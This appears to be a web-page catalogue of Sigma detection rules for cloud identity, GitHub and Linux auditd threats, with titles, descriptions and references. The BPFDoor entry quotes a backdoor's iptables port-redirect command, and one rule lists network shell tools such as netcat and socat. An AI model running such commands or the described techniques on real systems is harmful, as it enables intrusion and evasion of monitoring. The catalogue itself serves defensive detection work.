https://any-api.com/googleapis_com/compute/docs/vpnTunnels |
Google Workspace Application Access Level Modified |
Detects when an access level is changed for a Google Workspace application.
An access level is part of BeyondCorp Enterprise, which is Google Workspace's way of enforcing a Zero Trust model.
An adversary would be able to remove access levels to gain easier access to Google Workspace resources.
|
https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-application-settings, https://support.google.com/a/answer/9261439 |
Google Workspace Application Removed |
Detects when an application is removed from Google Workspace. |
https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST |
Google Workspace Granted Domain API Access |
Detects when an API access service account is granted domain authority. |
https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS |
Google Workspace MFA Disabled |
Detects when multi-factor authentication (MFA) is disabled. |
https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION |
Google Workspace Role Modified or Deleted |
Detects when a role is modified or deleted in Google Workspace. |
https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings |
Google Workspace Role Privilege Deleted |
Detects when a role privilege is deleted in Google Workspace. |
https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings |
Google Workspace User Granted Admin Privileges |
Detects when a Google Workspace user is granted admin privileges. |
https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE |
Github Delete Action Invoked |
Detects delete actions in the GitHub audit logs for codespaces, environments, projects and repositories. |
https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions |
Outdated Dependency Or Vulnerability Alert Disabled |
Dependabot performs a scan to detect insecure dependencies, and sends Dependabot alerts.
This rule detects when an organization owner disables Dependabot alerts for private repositories or Dependabot security updates for all repositories.
|
https://docs.github.com/en/code-security/dependabot/dependabot-alerts/about-dependabot-alerts, https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/managing-security-and-analysis-settings-for-your-organization |
Github High Risk Configuration Disabled |
Detects when a user disables a critical security feature for an organization. |
https://docs.github.com/en/organizations/managing-oauth-access-to-your-organizations-data/disabling-oauth-app-access-restrictions-for-your-organization, https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions, https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/enabling-features-for-your-repository/managing-security-and-analysis-settings-for-your-repository, https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise |
Github Fork Private Repositories Setting Enabled/Cleared |
Detects when the policy allowing forks of private and internal repositories is changed (enabled or cleared).
|
https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#private_repository_forking |
New Github Organization Member Added |
Detects when a new member is added or invited to a GitHub organization. |
https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions |
Github New Secret Created |
Detects when a user creates an Actions secret for the organization, environment, codespaces or repository. |
https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions |
Github Outside Collaborator Detected |
Detects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed; when an owner removes an outside collaborator from an organization; or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA.
|
https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions, https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-two-factor-authentication-for-your-organization/requiring-two-factor-authentication-in-your-organization |
Github Push Protection Bypass Detected |
Detects when a user bypasses the push protection on a secret detected by secret scanning. |
https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/push-protection-for-repositories-and-organizations, https://thehackernews.com/2024/03/github-rolls-out-default-secret.html |
Github Push Protection Disabled |
Detects if the push protection feature is disabled for an organization, enterprise, repositories or custom pattern rules. |
https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/push-protection-for-repositories-and-organizations, https://thehackernews.com/2024/03/github-rolls-out-default-secret.html |
Github Repository/Organization Transferred |
Detects when a repository or an organization is being transferred to another location. |
https://docs.github.com/en/repositories/creating-and-managing-repositories/transferring-a-repository, https://docs.github.com/en/organizations/managing-organization-settings/transferring-organization-ownership, https://docs.github.com/en/migrations, https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#migration |
Github Secret Scanning Feature Disabled |
Detects if the secret scanning feature is disabled for an enterprise or repository. |
https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/about-secret-scanning |
Github Self Hosted Runner Changes Detected |
A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com.
This rule detects changes to self-hosted runner configurations in the environment. Once a self-hosted runner configuration change is detected,
it should be validated in the GitHub UI because the log entry may not provide full context.
|
https://docs.github.com/en/actions/hosting-your-own-runners/about-self-hosted-runners#about-self-hosted-runners, https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#search-based-on-operation |
Github SSH Certificate Configuration Changed |
Detects when changes are made to the SSH certificate configuration of the organization. |
https://docs.github.com/en/enterprise-cloud@latest/organizations/managing-git-access-to-your-organizations-repositories/about-ssh-certificate-authorities, https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#ssh_certificate_authority |
Azure Login Bypassing Conditional Access Policies |
Detects a successful login to the Microsoft Intune Company Portal, which could allow bypassing Conditional Access Policies and Intune device trust using a tool like TokenSmith.
|
https://labs.jumpsec.com/tokensmith-bypassing-intune-compliant-device-conditional-access/, https://github.com/JumpsecLabs/TokenSmith |
Disabling Multi Factor Authentication |
Detects disabling of Multi Factor Authentication. |
https://research.splunk.com/cloud/c783dd98-c703-4252-9e8a-f19d9f5c949e/ |
New Federated Domain Added |
Detects the addition of a new Federated Domain. |
https://research.splunk.com/cloud/e155876a-6048-11eb-ae93-0242ac130002/, https://o365blog.com/post/aadbackdoor/ |
New Federated Domain Added - Exchange |
Detects the addition of a new Federated Domain. |
https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf, https://us-cert.cisa.gov/ncas/alerts/aa21-008a, https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html, https://www.sygnia.co/golden-saml-advisory, https://o365blog.com/post/aadbackdoor/ |
Activity from Suspicious IP Addresses |
Detects when Microsoft Cloud App Security reports that users were active from an IP address identified as risky by Microsoft Threat Intelligence.
These IP addresses are involved in malicious activities, such as botnet C&C, and may indicate a compromised account.
|
https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference |
Activity Performed by Terminated User |
Detects when Microsoft Cloud App Security reports activity by users whose account was terminated in Azure AD but who still perform activities in other platforms such as AWS or Salesforce.
This is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.
|
https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference |
Activity from Anonymous IP Addresses |
Detects when Microsoft Cloud App Security reports that users were active from an IP address that has been identified as an anonymous proxy IP address. |
https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference |
Data Exfiltration to Unsanctioned Apps |
Detects when Microsoft Cloud App Security reports that a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization. |
https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference |
Activity from Infrequent Country |
Detects when Microsoft Cloud App Security reports an activity occurring from a location that was not recently visited, or was never visited, by any user in the organization. |
https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference |
Microsoft 365 - Impossible Travel Activity |
Detects when Microsoft Cloud App Security reports a risky sign-in attempt due to a login associated with impossible travel. |
https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference |
Logon from a Risky IP Address |
Detects when Microsoft Cloud App Security reports that a user signed into your sanctioned apps from a risky IP address. |
https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference |
Microsoft 365 - Potential Ransomware Activity |
Detects when Microsoft Cloud App Security reports that a user uploaded files to the cloud that might be infected with ransomware. |
https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference |
PST Export Alert Using eDiscovery Alert |
Alerts when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually contains sensitive information, including email body content. |
https://learn.microsoft.com/en-us/microsoft-365/compliance/alert-policies?view=o365-worldwide |
PST Export Alert Using New-ComplianceSearchAction |
Alerts when a user has exported the results of a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection will catch a PST export even if the 'eDiscovery search or exported' alert is disabled in O365. This rule applies to ExchangePowerShell usage, both on-premises and from the cloud. |
https://learn.microsoft.com/en-us/powershell/module/exchange/new-compliancesearchaction?view=exchange-ps |
Suspicious Inbox Forwarding |
Detects when Microsoft Cloud App Security reports suspicious email forwarding rules, for example when a user created an inbox rule that forwards a copy of all emails to an external address. |
https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference |
Suspicious OAuth App File Download Activities |
Detects when Microsoft Cloud App Security reports that an app downloaded multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user. |
https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference |
Microsoft 365 - Unusual Volume of File Deletion |
Detects when Microsoft Cloud App Security reports that a user has deleted an unusually large volume of files. |
https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference |
Microsoft 365 - User Restricted from Sending Email |
Detects when the Security & Compliance Center reports a user who exceeded the sending limits of the service policies and has therefore been restricted from sending email. |
https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference |
Okta Admin Functions Access Through Proxy |
Detects access to Okta admin functions through proxy. |
https://www.beyondtrust.com/blog/entry/okta-support-unit-breach, https://dataconomy.com/2023/10/23/okta-data-breach/, https://blog.cloudflare.com/how-cloudflare-mitigated-yet-another-okta-compromise/ |
Okta Admin Role Assigned to an User or Group |
Detects when the Administrator role is assigned to a user or group. |
https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/ |
Okta Admin Role Assignment Created |
Detects when a new admin role assignment is created, which could be a sign of privilege escalation or persistence. |
https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/ |
Okta API Token Created |
Detects when an API token is created. |
https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/ |
Okta API Token Revoked |
Detects when an API token is revoked. |
https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/ |
Okta Application Modified or Deleted |
Detects when an application is modified or deleted. |
https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/ |
Okta Application Sign-On Policy Modified or Deleted |
Detects when an application Sign-on Policy is modified or deleted. |
https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/ |
Okta FastPass Phishing Detection |
Detects when Okta FastPass prevents a known phishing site. |
https://sec.okta.com/fastpassphishingdetection, https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/ |
Okta Identity Provider Created |
Detects when a new identity provider is created for Okta. |
https://developer.okta.com/docs/reference/api/system-log/, https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection |
Okta Network Zone Deactivated or Deleted |
Detects when a Network Zone is deactivated or deleted. |
https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/ |
Okta MFA Reset or Deactivated |
Detects an attempt to deactivate or reset MFA. |
https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/ |
Okta New Admin Console Behaviours |
Detects when Okta identifies new activity in the Admin Console. |
https://developer.okta.com/docs/reference/api/system-log/, https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection |
Potential Okta Password in AlternateID Field |
Detects when a user has potentially entered their password into the
username field, which will cause the password to be retained in log files.
|
https://developer.okta.com/docs/reference/api/system-log/, https://www.mitiga.io/blog/how-okta-passwords-can-be-compromised-uncovering-a-risk-to-user-data, https://help.okta.com/en-us/Content/Topics/users-groups-profiles/usgp-create-character-restriction.htm |
Okta Policy Rule Modified or Deleted |
Detects when a Policy Rule is modified or deleted. |
https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/ |
Okta Policy Modified or Deleted |
Detects when an Okta policy is modified or deleted. |
https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/ |
Okta Security Threat Detected |
Detects when a security threat is detected in Okta. |
https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm, https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/ |
Okta Suspicious Activity Reported by End-user |
Detects when an Okta end-user reports activity by their account as being potentially suspicious. |
https://developer.okta.com/docs/reference/api/system-log/, https://github.com/okta/workflows-templates/blob/master/workflows/suspicious_activity_reported/readme.md |
Okta Unauthorized Access to App |
Detects when unauthorized access to an app occurs. |
https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/ |
Okta User Account Locked Out |
Detects when a user account is locked out. |
https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/ |
New Okta User Created |
Detects new user account creation |
https://developer.okta.com/docs/reference/api/event-types/ |
Okta User Session Start Via An Anonymising Proxy Service |
Detects when an Okta user session starts where the user is behind an anonymising proxy service. |
https://developer.okta.com/docs/reference/api/system-log/, https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection |
OneLogin User Assumed Another User |
Detects when a user assumes another user account. |
https://developers.onelogin.com/api-docs/1/events/event-resource |
OneLogin User Account Locked |
Detects when a user account is locked or suspended. |
https://developers.onelogin.com/api-docs/1/events/event-resource/ |
Default Credentials Usage |
Before deploying any new asset, change all default passwords to values consistent with administrative-level accounts.
This Sigma rule detects default credential usage. Sigma rule for the Qualys vulnerability scanner. Scan type - Vulnerability Management.
|
https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf, https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists |
Host Without Firewall |
Host without a firewall. An alert means the host is not compliant. Sigma rule for the Qualys vulnerability scanner. Scan type - Vulnerability Management. |
https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf |
Cleartext Protocol Usage Via Netflow |
Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels.
Ensure that encryption is used for all sensitive information in transit.
Ensure that encrypted channels are used for all administrative account access.
|
https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf |
Audio Capture |
Detects attempts to record audio with the arecord utility |
https://linux.die.net/man/1/arecord, https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa |
Auditing Configuration Changes on Linux Host |
Detects changes to auditd configuration files |
https://github.com/Neo23x0/auditd/blob/master/audit.rules, Self Experience |
Binary Padding - Linux |
Adversaries may use binary padding to add junk data and change the on-disk representation of malware.
This rule detects the use of dd and truncate to add junk data to a file.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md |
BPFDoor Abnormal Process ID or Lock File Accessed |
Detects access to BPFDoor .lock and .pid files in the temporary file storage directory |
https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/, https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor |
Bpfdoor TCP Ports Redirect |
All TCP traffic on a particular port from the attacker's host is redirected to a different port, e.g. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392'.
The traffic looks like encrypted SSH communication going to TCP port 22, but in reality it is directed to the shell port once it hits the iptables rule, for the attacker's host only.
|
https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/, https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor |
Linux Capabilities Discovery |
Detects attempts to discover files with the setuid/setgid capability set, which could allow an adversary to escalate their privileges. |
https://man7.org/linux/man-pages/man8/getcap.8.html, https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/, https://mn3m.info/posts/suid-vs-capabilities/, https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099 |
File Time Attribute Change - Linux |
Detects file time attribute changes used to hide new files or changes to existing files. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md |
Remove Immutable File Attribute - Auditd |
Detects the removal of the immutable file attribute. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md |
Clipboard Collection with Xclip Tool - Auditd |
Detects attempts to collect data stored in users' clipboards using the xclip tool.
Xclip has to be installed.
Using this rule on servers is highly recommended, since clipboard utilities are heavily used on user workstations.
|
https://linux.die.net/man/1/xclip, https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/ |
Clipboard Collection of Image Data with Xclip Tool |
Detects attempts to collect image data stored in users' clipboards using the xclip tool.
Xclip has to be installed.
Using this rule on servers is highly recommended, since clipboard utilities are heavily used on user workstations.
|
https://linux.die.net/man/1/xclip |
Possible Coin Miner CPU Priority Param |
Detects a command line parameter very often used with coin miners |
https://xmrig.com/docs/miner/command-line-options |
Creation Of An User Account |
Detects the creation of a new user account. Such accounts may be used for persistence without requiring persistent remote access tools to be deployed on the system. |
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files, https://access.redhat.com/articles/4409591#audit-record-types-2, https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07 |
Data Compressed |
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. |
https://github.com/redcanaryco/atomic-red-team/blob/a78b9ed805ab9ea2e422e1aa7741e9407d82d7b1/atomics/T1560.001/T1560.001.md |
Data Exfiltration with Wget |
Detects attempts to post a file using the wget utility.
An adversary can bypass permission restrictions through a misconfigured sudo permission for the wget utility, which could allow them to read files like /etc/shadow.
|
https://linux.die.net/man/1/wget, https://gtfobins.github.io/gtfobins/wget/ |
Overwriting the File with Dev Zero or Null |
Detects overwriting (effectively wiping/deleting) of a file. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md |
Disable System Firewall |
Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md, https://firewalld.org/documentation/man-pages/firewall-cmd.html |
File or Folder Permissions Change |
Detects file and folder permission changes. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md |
Credentials In Files - Linux |
Detects attempts to extract passwords with grep |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md |
Use Of Hidden Paths Or Files |
Detects calls to hidden files or files located in hidden directories on NIX systems. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md |
Hidden Files and Directories |
Detects an adversary creating a hidden file or directory, by detecting directories or files with "." as the first character of their name |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md |
Steganography Hide Zip Information in Picture File |
Detects appending of a zip file to an image |
https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/ |
Linux Keylogging with Pam.d |
Detects attempts to enable auditing of TTY input |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md, https://linux.die.net/man/8/pam_tty_audit, https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing, https://access.redhat.com/articles/4409591#audit-record-types-2 |
Modification of ld.so.preload |
Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md, https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html |
Loading of Kernel Module via Insmod |
Detects loading of kernel modules with insmod command.
Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.
Adversaries may use LKMs to obtain persistence within the system or elevate the privileges.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md, https://linux.die.net/man/8/insmod, https://man7.org/linux/man-pages/man8/kmod.8.html |
Logging Configuration Changes on Linux Host |
Detects changes to syslog daemon configuration files |
self experience |
Masquerading as Linux Crond Process |
Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation.
Several different variations of this technique have been observed.
|
https://github.com/redcanaryco/atomic-red-team/blob/8a82e9b66a5b4f4bc5b91089e9f24e0544f20ad7/atomics/T1036.003/T1036.003.md#atomic-test-2---masquerading-as-linux-crond-process |
Modify System Firewall |
Detects the removal of system firewall rules. Adversaries may only delete or modify a specific system firewall rule to bypass controls limiting network usage or access.
Detection rules that match only on the disabling of firewalls will miss this.
|
https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html, https://blog.aquasec.com/container-security-tnt-container-attack |
Linux Network Service Scanning - Auditd |
Detects enumeration of local or remote network services. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md |
Network Sniffing - Linux |
Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.
An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md |
Password Policy Discovery - Linux |
Detects password policy discovery commands |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md, https://linux.die.net/man/1/chage, https://man7.org/linux/man-pages/man1/passwd.1.html, https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu |
Systemd Service Reload or Start |
Detects a reload or a start of a service. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md |
Screen Capture with Import Tool |
Detects an adversary creating a screen capture of a desktop with the Import tool.
Using this rule on servers is highly recommended, since screenshot utilities are heavily used on user workstations.
ImageMagick must be installed.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md, https://linux.die.net/man/1/import, https://imagemagick.org/ |
Screen Capture with Xwd |
Detects an adversary creating a full-screen capture with xwd. Using this rule on servers is highly recommended, since screenshot utilities are heavily used on user workstations |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture, https://linux.die.net/man/1/xwd |
Split A File Into Pieces - Linux |
Detects use of the "split" command to split files into parts, possibly for transfer. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md |
Steganography Hide Files with Steghide |
Detects embedding of files using the steghide binary; adversaries may use this technique to prevent the detection of hidden information. |
https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/ |
Steganography Extract Files with Steghide |
Detects extraction of files using the steghide binary; adversaries may use this technique to prevent the detection of hidden information. |
https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/ |
Suspicious C2 Activities |
Detects suspicious activities as declared by Florian Roth in his 'Best Practice Auditd Configuration'.
This includes the detection of the following commands: wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap.
These commands match a few techniques from the "Command and Control" tactic, including, non-exhaustively, the following: Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132)
|
https://github.com/Neo23x0/auditd |
Suspicious Commands Linux |
Detects relevant commands often related to malware or hacking activity |
Internal Research - mostly derived from exploit code including code in MSF |
Program Executions in Suspicious Folders |
Detects program executions in suspicious non-program folders related to malware or hacking activity |
Internal Research |
Suspicious History File Operations - Linux |
Detects command line operations on shell history files |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md |
Systemd Service Creation |
Detects the creation of systemd services, which could be used by adversaries to execute malicious code. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md |
System Information Discovery - Auditd |
Detects System Information Discovery commands |
https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1082/T1082.md |
System and Hardware Information Discovery |
Detects system information discovery commands |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-4---linux-vm-check-via-hardware |
System Shutdown/Reboot - Linux |
Adversaries may shut down or reboot systems to interrupt access to, or aid in the destruction of, those systems. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md |
Unix Shell Configuration Modification |
Detects Unix shell configuration modification. Adversaries may establish persistence through malicious commands that are executed when a new shell is opened. |
https://objective-see.org/blog/blog_0x68.html, https://web.archive.org/web/20221204161143/https://www.glitch-cat.com/p/green-lambert-and-attack, https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat |
Steganography Unzip Hidden Information From Picture File |
Detects extraction of a zip file from an image file |
https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/ |
System Owner or User Discovery - Linux |
Detects the execution of host or user discovery utilities such as "whoami", "hostname", "id", etc.
Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md |
Webshell Remote Command Execution |
Detects possible command execution by web application/web shell |
Personal Experience of the Author |
Equation Group Indicators |
Detects suspicious shell commands used in various Equation Group scripts and tools |
https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1 |
